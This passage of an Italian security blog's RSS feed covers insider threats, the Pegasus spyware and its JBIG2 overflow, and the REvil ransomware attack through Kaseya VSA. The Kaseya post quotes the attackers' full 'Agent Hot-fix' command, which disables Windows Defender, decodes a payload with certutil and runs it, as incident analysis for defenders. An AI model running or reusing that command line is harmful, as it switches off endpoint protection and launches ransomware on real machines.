Accade invece che i dipendenti sfoghino le loro frustrazioni lavorative contro la direzione recando danno volontariamente all’azienda. Un caso reale riguarda la Desjardins Group, una cooperativa canadese di servizi finanziari, dove un dipendente nel 2019 ha esfiltrato le informazioni riguardanti &lt;strong&gt;quasi 2,7 milioni di persone e 173.000 aziende&lt;/strong&gt;, cioè oltre il 40% dei clienti.
Le informazioni trapelate includevano nomi, indirizzi, date di nascita, numeri di previdenza sociale, indirizzi e-mail e informazioni sulle transazioni finanziarie.&lt;/p&gt;

&lt;h3 id=&#34;l-insider-inconsapevole&#34;&gt;L&amp;rsquo;insider inconsapevole&lt;/h3&gt;

&lt;p&gt;Un’ulteriore minaccia in azienda deriva dagli utenti che inconsapevolmente vengono manovrati dai criminali ad eseguire azioni malevole grazie alle mail di phishing.
I danni che derivano da una azione compiuta in buona fede, come ad esempio l’apertura di un allegato infetto o l’inserimento delle credenziali dell’account di posta elettronica, possono talvolta avere un &lt;strong&gt;grave impatto sulla business continuity&lt;/strong&gt; dell’azienda.&lt;/p&gt;

&lt;p&gt;La presenza di servizi di &lt;em&gt;Phishing-as-a-Service&lt;/em&gt; (PhaaS) ha accelerato ulteriormente le campagne malevole contro gli insider negligenti, rendendole sempre più sosfisticate. Il 21 settembre 2021, gli analisti di Microsoft hanno individuato un servizio nel dark web conosciuto come &lt;em&gt;BulletProofLink&lt;/em&gt; o &lt;em&gt;Anthrax&lt;/em&gt; che fornisce servizi di malspam in modalità PHaaS.
Il servizio è un&amp;rsquo;evoluzione dei &amp;ldquo;kit di phishing&amp;rdquo; che erano, fino a qualche tempo fa, tra i più venduti nei diversi &lt;a href=&#34;https://cybergon.com/blog/posts/il-business-dietro-al-business-cybercrime-as-a-service/&#34;&gt;marketplace su Tor&lt;/a&gt;, dove sono raccolti circa 120 diversi modelli di mail phishing che imitano i login di accesso tipici delle aziende.&lt;/p&gt;

&lt;p&gt;Il PhaaS è erogato come un &lt;strong&gt;vero e proprio servizio end-to-end&lt;/strong&gt;: gli operatori, infatti, gestiscono le configurazioni del dominio per ospitare le landing page, l&amp;rsquo;invio delle e-mail di phishing e la raccolta delle credenziali acquisite durante gli attacchi. I prezzi vanno da &lt;strong&gt;$80 a $100&lt;/strong&gt; e sono disponibili sullo store anche tutorial per aiutare i clienti nell’utilizzo del servizio.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/insider-threat/insider-threat.png&#34; alt=&#34;insider-threat&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;strategie-di-mitigazione-del-rischio&#34;&gt;Strategie di mitigazione del rischio&lt;/h2&gt;

&lt;p&gt;La mancanza di buone pratiche di sicurezza informatica applicate in modo capillare in azienda porta le imprese ad essere &lt;strong&gt;più soggette ad attacchi informatici&lt;/strong&gt;: la minaccia interna, infatti, è un rischio costante per la maggior parte delle organizzazioni e prevenzione e consapevolezza sono gli unici strumenti che possono aiutare a mitigarla, specie per quanto riguarda le azioni svolte con inconsapevolezza.&lt;/p&gt;

&lt;p&gt;A tal proposito, una buona consapevolezza si ottiene solo con una &lt;strong&gt;formazione continua&lt;/strong&gt;, che coinvolge i dipendenti in un approccio di informatica responsabile e li rende dei security ambassador in tutti gli ambiti ed i processi lavorativi. Tuttavia, è importante sottolineare che la formazione, per essere efficace, deve anche essere validata da risultati concreti, misurabili attraverso test di phishing e test online che coinvolgano tutti i dipendenti di un’azienda o di una organizzazione.&lt;/p&gt;

&lt;p&gt;Bisogna inoltre essere coscienti dei diversi privilegi che si rendono realmente necessari per ciascun ruolo in azienda: non tutti, infatti, hanno bisogno di avere accesso a tutti i dati e una ripartizione logica dei permessi aiuta a ridurre sensibilmente il rischio e a prevenire il rischio di perdite di dati esponenziali dovuto alla &lt;a href=&#34;https://www.cybersecurity360.it/soluzioni-aziendali/least-privilege-dati-al-sicuro-da-accessi-non-autorizzati-col-principio-del-privilegio-minimo/&#34;&gt;privilige escalation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Infine, fornire la visibilità del perimetro interno, dotarsi di sonde e strumenti di detection è il fondamento di una strategia di difesa che viene studiata, pianificata e realizzata nell&amp;rsquo;ottica di prevention degli attacchi, siano essi fortuiti o premeditati.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Pegasus: la storia e le caratteristiche del malware zero-click</title>
         <link>https://blog.cybergon.com/posts/pegasus-la-storia-e-le-caratteristiche-del-malware-zero-click/</link>
         <pubDate>Tue, 28 Sep 2021 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Jeremy Moeys</author>
         
               
             <author>Stefano Andreatta</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/pegasus-la-storia-e-le-caratteristiche-del-malware-zero-click/</guid>
         <description>

&lt;p&gt;Il 18 luglio 2021 Amnesty International ha avuto accesso ad un &lt;strong&gt;database di oltre 50.000 numeri di telefono&lt;/strong&gt; di attivisti, giornalisti, politici, avvocati che sarebbero stati presi di mira dallo spyware Pegasus di proprietà della società israeliana NSO Group.&lt;/p&gt;

&lt;p&gt;L’ONG inglese si è coordinata con diverse testate giornalistiche, come il The Guardian e Le Monde, per accusare formalmente la società israeliana di aver utilizzato il malware con &lt;strong&gt;finalità differenti da quelle previste&lt;/strong&gt;, ovvero il monitoraggio di criminali e terroristi.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/Codice-malevolo.jpg&#34; alt=&#34;Codice-malevolo&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;la-storia-dello-spyware&#34;&gt;La storia dello spyware&lt;/h2&gt;

&lt;p&gt;Non è la prima volta che la NSO Group Technologies si trova &lt;strong&gt;al centro di un attacco mediatico&lt;/strong&gt;: già nel 2016 la società venne accusata di sfruttare la vulnerabilità Trident al fine di hackerare diversi dispositivi di attivisti e giornalisti tra cui quello di Ahmed Mansoor, difensore dei diritti umani riconosciuto a livello internazionale.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Trident&lt;/strong&gt; è composta da &lt;strong&gt;tre singole vulnerabilità&lt;/strong&gt; che, se utilizzate in successione, consentono la completa &lt;strong&gt;compromissione di un dispositivo Apple&lt;/strong&gt; a causa di un difetto del Webkit, il motore utilizzato dal browser Safari, dalla Mail e molte altre app Apple. Nello specifico:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;CVE-2016-4657&lt;/strong&gt;: &lt;em&gt;Memory Corruption&lt;/em&gt; in WebKit - consente all&amp;rsquo;utente malintenzionato di compromettere il dispositivo quando l&amp;rsquo;utente fa clic su un link malevolo.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2016-4655&lt;/strong&gt;: &lt;em&gt;Kernel Information Leak&lt;/em&gt; - permette di avere accesso alla memoria del sistema operativo.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2016-4656&lt;/strong&gt;: Compromissione della memoria del Kernel porta al Jailbreak – permette all’attaccante di fare in modo silente il jailbreak del dispositivo e installare Pegasus.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nel 2018, a seguito dell’assassinio ad Instabul del giornalista saudita del Washington Post Jamal Khashoggi, è stato possibile identificare &lt;strong&gt;6 SMS ricevuti che collegavano link malevoli&lt;/strong&gt; direttamente allo spyware Pegasus.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/Messaggioarabo.png&#34; alt=&#34;Messaggioarabo&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Inoltre, WhatsApp nel 2019 ha rivelato che il software della NSO è stato utilizzato per inviare malware a più di 1.400 telefoni, tra cui quello di &lt;strong&gt;Jeff Bezos&lt;/strong&gt;, sfruttando una nuova &lt;strong&gt;vulnerabilità zero-day&lt;/strong&gt;: effettuando una chiamata WhatsApp su un dispositivo target, il codice dannoso di Pegasus veniva installato sul telefono, anche senza nessuna risposta da parte delle vittime.&lt;/p&gt;

&lt;p&gt;Nel 2020 &lt;strong&gt;la vulnerabilità Kismet&lt;/strong&gt; è stata utilizzata per veicolare Pegasus attraverso &lt;strong&gt;l’iMessage degli iPhone&lt;/strong&gt; delle vittime nella versione iOS 13.5.1, di cui è stata subito rilasciata la patch da Apple.&lt;/p&gt;

&lt;p&gt;A Luglio 2021, grazie ai ricercatori di Citizen Lab, sono stati identificati &lt;strong&gt;gli exploit ForcedEntry e Megalodon&lt;/strong&gt; dal gruppo di sicurezza di Amnesty International, che ha appunto provveduto a denunciare la cosa.
Le vittime di questo specifico caso hanno un peso specifico non indifferente: sia per la cifra elevata, una lista di 50.000 numeri di telefono, sia per la qualità delle intercettazioni che includono 13 capi di Stato, 180 giornalisti, accademici, uomini d&amp;rsquo;affari, avvocati, medici, diplomatici. Tra i politici spiccano nomi come &lt;strong&gt;Emanuel Macron e Angela Merkel&lt;/strong&gt;, il primo perseguito dall’intelligence del Marocco mentre la seconda dagli 007 danesi.
I Paesi che hanno maggiormente usufruito di questa tecnologia, oltre quelli già citati, sono il Messico e gli Emirati Arabi Uniti, con più di 10 mila numeri sorvegliati.
L’immagine mostra una mappa dei Paesi che hanno avuto il maggiore impatto dall’attacco di spionaggio con più di 1000 numeri in Francia e 6000 per l’Algeria.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/Grafico-pegasus-impatto.png&#34; alt=&#34;Grafico-pegasus-impatto&#34; /&gt;&lt;/p&gt;

&lt;p&gt;NSO ha temporaneamente limitato l’utilizzo di Pegasus per alcuni clienti e ha avviato le &lt;strong&gt;indagini sulle segnalazioni per uso improprio&lt;/strong&gt;, decidendo così di creare un fronte di opposizione contro le accuse mondiali da parte di governi e testa giornalistiche, negando sul proprio sito che “la lista” sia riferita ai target dello spyware e che, in nessun modo, siano legate a NSO.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/sito-NSO-blogpost.png&#34; alt=&#34;sito-NSO-blogpost&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;pegasus-caratteristiche-e-analisi-tecnica&#34;&gt;Pegasus:caratteristiche e analisi tecnica&lt;/h2&gt;

&lt;p&gt;La pericolosità di questi spyware è la natura &lt;strong&gt;zero-click&lt;/strong&gt;: conoscendo il numero di telefono dell’utente target si ha la possibilità, senza la sua interazione, di estrarre messaggi, foto ed e-mail, di registrare chiamate e attivare le webcam e i microfoni. Accedendo al GPS, inoltre, vi sarebbe la possibilità di tracciare con precisione i movimenti di una persona in tempo reale.&lt;/p&gt;

&lt;p&gt;Il valore commerciale di un’arma cyber di livello sofisticato varia dai 30 mila euro, se vengono utilizzati lo smishing o il phishing come vettori di attacco, fino a &lt;strong&gt;8 milioni di euro&lt;/strong&gt; per le vulnerabilità zero-click. In generale, più è facile inoculare un attacco, più questo diventa efficace e oneroso per il compratore.&lt;/p&gt;

&lt;p&gt;Analizziamo le due vulnerabilità che hanno interessato i dispositivi Apple sfruttate dal malware Pegasus nel 2021 : &lt;strong&gt;CoreGraphics e Webkit.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CoreGraphics CVE-2021-30860&lt;/strong&gt;, che analizzeremo più nel dettaglio, è stata segnalata il 24 agosto da The Citizen Lab. Si tratta di un attacco zero-click, ovvero dove il criminale non ha bisogno di nessuna interazione dell’utente.
La vulnerabilità in questione sfrutta una problematica di &lt;em&gt;integer overflow&lt;/em&gt; relativa alla componente Core Graphics, più precisamente nelle operazioni di decodifica di dati JBIG2. JBIG2 (&lt;em&gt;Joint Bi-level Image Experts Group&lt;/em&gt;) è un formato di compressione di immagini che può essere inserito come stream in un documento PDF o PSD. Dalle analisi svolte da CitizenLab effettuate su dispositivi compromessi da Pegasus, sono emersi alcuni file di tipo immagine che causavano il crash di “IMTranscoderAgent” (uno dei componenti che permettono il &lt;em&gt;processing dei dati di iMessage&lt;/em&gt;, inclusi l’invio / ricezione di immagini).&lt;/p&gt;

&lt;p&gt;Dall’&lt;a href=&#34;https://objective-see.com/blog/blog_0x67.html&#34;&gt;analisi effettuata da Tom McGuire&lt;/a&gt;, emerge come, all’interno della componente &lt;em&gt;JBIG2Stream processor&lt;/em&gt; in una versione di macOS vulnerabile, &lt;em&gt;la variabile “numSyms”&lt;/em&gt; (intero a 32bit) viene incrementata della dimensione del segmento del processo corrente. Questo può portare ad un evento di “integer overflow”, poiché non viene effettuato nessun controllo relativo a questi assegnamenti.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/primo-codice-malware.png&#34; alt=&#34;primo-codice-malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Come possiamo vedere anche dal codice disassemblato sottostante preso dalla versione macOS vulnerabile (11.5.2), l’istruzione add eax, &lt;em&gt;rbx+0ch&lt;/em&gt; (che è un calcolo a 32-bit) non ha nessun controllo per evitare un possibile &lt;em&gt;overflow&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/Secondo-codice-malware.png&#34; alt=&#34;Secondo-codice-malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;In generale, per poter sfruttare una vulnerabilità le problematiche di tipo &lt;em&gt;integer overflow&lt;/em&gt; sono spesso combinate con altri errori di programmazione. Ad esempio i numeri interi in questione vengono utilizzati per allocare dinamicamente porzioni di memoria.
La variabile &lt;em&gt;numSyms&lt;/em&gt; viene usata successivamente come primo argomento della &lt;em&gt;gmallocn&lt;/em&gt;.
Il valore di &lt;em&gt;numSyms&lt;/em&gt; è &lt;strong&gt;in questo caso controllato dall’attaccante&lt;/strong&gt;, con l’obbiettivo di mantenerlo il più piccolo possibile in modo da allocare solo una piccola parte di memoria per poi effettuare l’overflow.
Nel codice sottostante si può visionare l’overflow effettivo.
Alla riga 2004, alla variabile “syms” (risultato della &lt;em&gt;gmallocn&lt;/em&gt;) viene assegnato il &lt;em&gt;Bitmap(k)&lt;/em&gt;. Poiché “k” è definito in funzione di &lt;em&gt;getSize()&lt;/em&gt;, esso può avere un valore molto più grande rispetto alla dimensione allocata per “syms” e il risultato è un overflow.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/Terzo-codice-malware.png&#34; alt=&#34;Terzo-codice-malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Per quanto riguarda &lt;strong&gt;Webkit CVE-2021-30858&lt;/strong&gt; è stata scoperta da un ricercatore anonimo e concerne l’infezione del dispositivo dell’utente a causa del caricamento di pagine Web malevole utilizzando il browser Safari. Sembra che il gruppo criminale che ha sfruttato questa vulnerabilità abbia anche un sofisticato front-end per visualizzare i dettagli degli attacchi e delle loro vittime in tempo reale.&lt;/p&gt;

&lt;h2 id=&#34;remediation&#34;&gt;Remediation&lt;/h2&gt;

&lt;p&gt;Per quanto riguarda i dispositivi mobili, &lt;strong&gt;Apple ha rilasciato i nuovi aggiornamenti&lt;/strong&gt; per iOS 14.8 e iPadOS 14.8 con un documento di supporto che descrive in modo approfondito le due vulnerabilità.
Il consiglio è di &lt;strong&gt;aggiornare immediatamente&lt;/strong&gt; il sistema operativo: le patch sono disponibili già per l’iPhone 6s e versioni successive, iPad Pro (tutti i modelli), iPad Air 2 e versioni successive, iPad 5a generazione e versioni successive, iPad mini 4 e versioni successive e iPod touch (7a generazione).&lt;/p&gt;

&lt;p&gt;Amnesty International ha pubblicato un tool open source gratuito di nome &lt;strong&gt;Mobile Verification Toolkit (MVT)&lt;/strong&gt; che può verificare se il proprio dispositivo è stato infettato da Pegasus. Il tool effettua un’analisi forense sui domini visitati dal dispositivo cercando dei pattern noti.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Attenzione:&lt;/strong&gt; MVT è uno strumento di ricerca avanzato e il suo utilizzo richiede l’utilizzo di un esperto in analisi forensics.&lt;/p&gt;

&lt;p&gt;È disponibile su &lt;a href=&#34;www.github.com/mvt-project/mvt/&#34;&gt;GitHub&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/pegasus/MTV-su-gitlab.png&#34; alt=&#34;MTV-su-gitlab&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;conclusione&#34;&gt;Conclusione&lt;/h2&gt;

&lt;p&gt;In futuro NSO Group continuerà a operare, a innovare e a sviluppare &lt;strong&gt;malware nuovi e sempre più sofisticati&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Alcuni ricercatori sostengono che le versioni più avanzate di Pegasus saranno in grado di occupare solo la &lt;strong&gt;memoria temporanea&lt;/strong&gt; del dispositivo, il che significa che, una volta spento lo smartphone, ogni traccia digitale dello spyware potrebbe scomparire e rendere vani tool e indagini forensi.&lt;/p&gt;

&lt;p&gt;Per chi si occupa di sicurezza informatica il compitò sarà quello di ridurre al minimo l&amp;rsquo;impatto degli attacchi con &lt;strong&gt;una strategia di mitigazione&lt;/strong&gt;, &lt;strong&gt;creare awareness&lt;/strong&gt; e lasciare il compito ai bug hunter di ricercare vulnerabilità zero day nei sistemi operativi e nelle applicazioni.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Attacchi alla Supply Chain: il caso Kaseya</title>
         <link>https://blog.cybergon.com/posts/attacchi-alla-supply-chain-il-caso-kaseya/</link>
         <pubDate>Tue, 06 Jul 2021 10:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Stefano Andreatta</author>
         
               
             <author>Jeremy Moeys</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/attacchi-alla-supply-chain-il-caso-kaseya/</guid>
         <description>

&lt;p&gt;Venerdì 2 luglio è stato registrato uno degli attacchi informatici di più vasta portata dopo Solarwinds: più di 1000 le aziende hanno subito un attacco ransomware coordinato dal &lt;strong&gt;gruppo criminale REvil&lt;/strong&gt; e secondo le fonti Eset sarebbero 17 i paesi coinvolti tra cui UK, USA, Sudafrica, Canada, Argentina, Messico, Nuova Zelanda e Italia.&lt;/p&gt;

&lt;p&gt;L’APT russa rivendica l’attacco in una nota sul loro blog in cui viene specificato che “è stata effettuata un’offensiva a diversi Managed Service Provider con migliaia di server e macchine infette”.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/kaseya/kaseya-blog.png&#34; alt=&#34;kaseya-blog&#34; /&gt;&lt;/p&gt;

&lt;p&gt;L’entità dell’attacco ha permesso ai criminali non solo di richiedere &lt;strong&gt;un riscatto&lt;/strong&gt; di $5 milioni per ogni MSP crittografato e di $50 mila per ogni cliente, ma di proporre anche un acquisto “comune” di 70 milioni di dollari in Bitcoin &lt;strong&gt;per pubblicare un decryptor universale&lt;/strong&gt; in grado di sbloccare tutti i sistemi. Il gruppo ha messo a disposizione delle organizzazioni colpite un metodo di contatto per negoziare la decifratura dei file.&lt;/p&gt;

&lt;p&gt;Il gruppo REvil, conosciuto anche come Sodokinibi, si è costruito una reputazione dopo aver estorto 11 milioni di dollari al gigante brasiliano della carne JBS e più 50 milioni di dollari al fornitore taiwanese di Apple, Quanta, a seguito di un’esfiltrazione sugli schemi di progettazione del nuovo MacBook.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/kaseya/kaseya-revil.jpg&#34; alt=&#34;kaseya-revil&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;le-fasi-dell-attacco&#34;&gt;Le fasi dell&amp;rsquo;attacco&lt;/h2&gt;

&lt;p&gt;Per l’attacco è stata sfruttata una &lt;strong&gt;vulnerabilità zero-day (CVE-2021-30116)&lt;/strong&gt; riconosciuta nel software VSA del provider IT Kaseya che ha permesso di propagare il ransomware nelle diverse reti delle infrastrutture IT. Il prodotto di Kaseya è &lt;strong&gt;basato su cloud&lt;/strong&gt; e fornisce il &lt;strong&gt;monitoraggio in remoto dei provider di servizi gestiti&lt;/strong&gt; grazie ad una console per gestire gli endpoint, distribuire patch e controllare l’accesso tramite MFA.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;2 luglio 16:00 EDT: (le 22:00 italiane) l’azienda Kaseya scopre l’attacco informatico in corso ed indica come linee guida l’immediato spegnimento dei server VSA situati in loco dai clienti e lo stop dei servizi analoghi erogati in SAAS.&lt;/li&gt;
&lt;li&gt;3 Luglio 10:30 EDT: Kaseya informa le forze dell’ordine e le agenzie governative per la sicurezza informatica. In serata pubblica un tool per il rilevamento dell’attacco.&lt;/li&gt;
&lt;li&gt;4 Luglio: Kaseya dichiara di voler iniziare il processo di ripristino il 5 luglio EOD.&lt;/li&gt;
&lt;li&gt;5 Luglio: è atteso un aggiornamento da parte di Kaseya verso le 13:00 EDT.&lt;/li&gt;
&lt;li&gt;5 Luglio: il consiglio di amministrazione di Kaseya ha stabilito che la società non è pronta per iniziare il ripristino del VSA. Questa decisione sembra portare a un ritardo nel rilascio della patch.&lt;/li&gt;
&lt;li&gt;6 Luglio: entro le 12:00 EDT è attesa la pubblicazione di nuovi aggiornamenti.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&#34;la-dinamica&#34;&gt;La dinamica&lt;/h3&gt;

&lt;p&gt;L’attacco mira a sfruttare &lt;strong&gt;l’anello debole della supply chain&lt;/strong&gt;: in questo caso il sistema di patching dei server VSA.&lt;/p&gt;

&lt;p&gt;Il pattern d’attacco è dunque molto simile a quello visto di recente nell’&lt;a href=&#34;https://cybergon.com/blog/posts/sunburst-backdoor-nelle-patch-di-solarwind-orion/&#34;&gt;attacco &amp;ldquo;Sunburst&amp;rdquo;&lt;/a&gt;, in cui gli attaccanti, dopo aver ottenuto l’accesso ad alcuni server Solarwinds tramite un processo di privilege escalation hanno installato una backdoor in uno script di aggiornamento di Orion.&lt;/p&gt;

&lt;p&gt;A differenza dell’attacco a Solarwinds, in cui gli attaccanti hanno sfruttato la vulnerabilità per effettuare un’attività di spionaggio industriale nei confronti delle organizzazioni che utilizzavano Orion, nell’attacco a Kaseya gli attaccanti hanno &lt;strong&gt;cifrato e reso inutilizzabili i dati e le procedure&lt;/strong&gt; contenuti all’interno dei sistemi compromessi con lo scopo di chiedere un riscatto in bitcoin/monero.&lt;/p&gt;

&lt;p&gt;Di seguito i dettagli dell’inizializzazione dell’attacco:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Il file malevolo è stato rilasciato all&amp;rsquo;interno del Kaseya&amp;rsquo;s &lt;code&gt;TempPath&lt;/code&gt;con il nome di &lt;code&gt;agent.exe&lt;/code&gt;. Questo appare come:
&lt;code&gt;c:\kworking\agent.exe&lt;/code&gt; di default e può essere configurabile tramite &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\&amp;lt;unique id&amp;gt;&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;La procedura VSA usata per il deploy del ransomware è chiamata &amp;ldquo;Kaseya VSA Agent Hot-fix”, mentre un’altra procedura è &amp;ldquo;Archive and Purge Logs&amp;rdquo;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/kaseya/kaseya-reddit.JPG&#34; alt=&#34;kaseya-reddit&#34; /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;La procedura &amp;ldquo;Kaseya VSA Agent Hot-fix” esegue quanto segue:
&lt;code&gt;C:\WINDOWS\system32\cmd.exe&amp;quot; /c ping 127.0.0.1 -n 4979 &amp;gt; nul &amp;amp; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend &amp;amp; copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe &amp;amp; echo %RANDOM% &amp;gt;&amp;gt; C:\Windows\cert.exe &amp;amp; C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe &amp;amp; del /q /f c:\kworking\agent.crt C:\Windows\cert.exe &amp;amp; c:\kworking\agent.exe&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Quando &lt;code&gt;agent.exe&lt;/code&gt; viene eseguito, l&amp;rsquo;eseguibile legittimo di Windows Defender &lt;code&gt;MsMpEng.exe&lt;/code&gt;e l’encryptor payload mpsvc.dll vengono estratti nel path &amp;ldquo;c:\Windows&amp;rdquo; per eseguire DLL sideloading.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;come-cambia-il-paradigma-nella-scelta-del-target&#34;&gt;Come cambia il paradigma nella scelta del target&lt;/h2&gt;

&lt;p&gt;Dopo Solarwinds, la strategia di attacco dei criminali sembra essere cambiata: concentrare risorse e capacità informatiche sulla compromissione di un solo produttore a monte della supply chain del settore del software per avere &lt;strong&gt;pieno accesso ai diversi utilizzatori&lt;/strong&gt;. Ciò rappresenta un punto di svolta e di innovazione nel mondo del cybercrime.&lt;/p&gt;

&lt;p&gt;L’&lt;strong&gt;effetto moltiplicativo&lt;/strong&gt; dell’attacco è semplice e intuitivo: compromettere la tecnologia software utilizzata dal provider &lt;strong&gt;scalando successivamente l’attacco&lt;/strong&gt; su decine o centinaia di clienti. Un MSP diventa così un obiettivo di alto valore poiché genererà una &lt;strong&gt;grande superficie di diffusione del ransomware&lt;/strong&gt; con un effetto &lt;em&gt;worm&lt;/em&gt; senza che le aziende debbano agire in alcun modo.&lt;/p&gt;

&lt;p&gt;Le organizzazioni criminali posseggono ormai &lt;strong&gt;dipartimenti dedicati alla ricerca delle vulnerabilità&lt;/strong&gt; nei prodotti: gli attacchi non sono più mirati ad una specifica azienda target ma ad una tecnologia comune che riesca ad impattare migliaia di vittime, aggirando varie policy di sicurezza, poiché l’attacco viene introdotto da un elemento &lt;em&gt;trusted&lt;/em&gt;. Nel dark web le vulnerabilità 0day più interessanti vengono acquistate attorno ai 2-5 milioni di dollari con un &lt;strong&gt;ritorno sull’investimento, nel caso di Kaseya e i 70 milioni, potenzialmente infinito&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;rimanere-aggiornati-non-basta-più&#34;&gt;Rimanere aggiornati non basta più&lt;/h2&gt;

&lt;p&gt;La CISA, l’agenzia per la Cybersecurity, è subito intervenuta condividendo gli &lt;strong&gt;indicatori di compromissione IoC&lt;/strong&gt; per rilevare il ransomware e invita ad &lt;strong&gt;installare la patch&lt;/strong&gt; (quando sarà resa disponibile), in seguito alla quale sarà necessario un ravvio dei server VSA.&lt;/p&gt;

&lt;p&gt;Difendersi da questo genere di attacchi sembra sempre più complesso. Una possibile soluzione potrebbe essere quella di adottare una politica di “zero trust” ovvero di non fidarsi di niente e di nessuno, ma ciò è quasi impossibile nella maggior parte delle realtà aziendali, soprattutto quelle di grandi dimensioni.&lt;/p&gt;

&lt;p&gt;Per ora, le raccomandazioni arrivano da CISA ed FBI. Le due agenzie consigliano agli MSP interessati dall’attacco di:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Scaricare &lt;a href=&#34;https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40&#34;&gt;lo strumento di rilevamento&lt;/a&gt; per il VSA Kaseya. Questo strumento  analizza il server o l’endpoint gestito e determina se sono presenti indicatori di compromissione (IoC);&lt;/li&gt;
&lt;li&gt;Abilitare l&amp;rsquo;autenticazione a più fattori (MFA) su ogni singolo account e per tutti i servizi rivolti ai clienti;&lt;/li&gt;
&lt;li&gt;Limitare le funzionalità di monitoraggio e gestione remota (RMM);&lt;/li&gt;
&lt;li&gt;Inserire le interfacce amministrative di RMM dietro una rete privata virtuale (VPN) o un firewall in una rete amministrativa dedicata.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Ai clienti dei Managed Service Provider coinvolti si raccomanda di intraprendere azioni immediate per implementare le seguenti best practice:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Assicurarsi che i backup siano aggiornati e correttamente archiviati;&lt;/li&gt;
&lt;li&gt;Utilizzare un processo manuale di gestione delle patch;&lt;/li&gt;
&lt;li&gt;Implementare un principio del least priviligies per gli account amministrativi.&lt;/li&gt;
&lt;/ol&gt;
</description>
       </item>
       
       <item>
         <title>La Cyber Security a difesa della tavola italiana</title>
         <link>https://blog.cybergon.com/posts/la-cyber-security-a-difesa-della-tavola-italiana/</link>
         <pubDate>Wed, 30 Jun 2021 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Jeremy Moeys</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/la-cyber-security-a-difesa-della-tavola-italiana/</guid>
         <description>

&lt;p&gt;L’attacco ransomware a JBS, produttrice brasiliana di carne bovina che possiede più di 150 stabilimenti negli USA e in tutto il mondo, ha riportato l’attenzione delle agenzie internazionali sull’importanza della &lt;strong&gt;sicurezza informatica nel settore del Food &amp;amp; Beverage&lt;/strong&gt;. Una dimostrazione di forza da parte del gruppo criminale &lt;em&gt;REvil&lt;/em&gt;, conosciuto anche come &lt;em&gt;Sodinokibi&lt;/em&gt;, che ha interrotto un quinto della fornitura di carne, sollevando una forte preoccupazione in un settore critico dell&amp;rsquo;economia degli Stati Uniti.&lt;/p&gt;

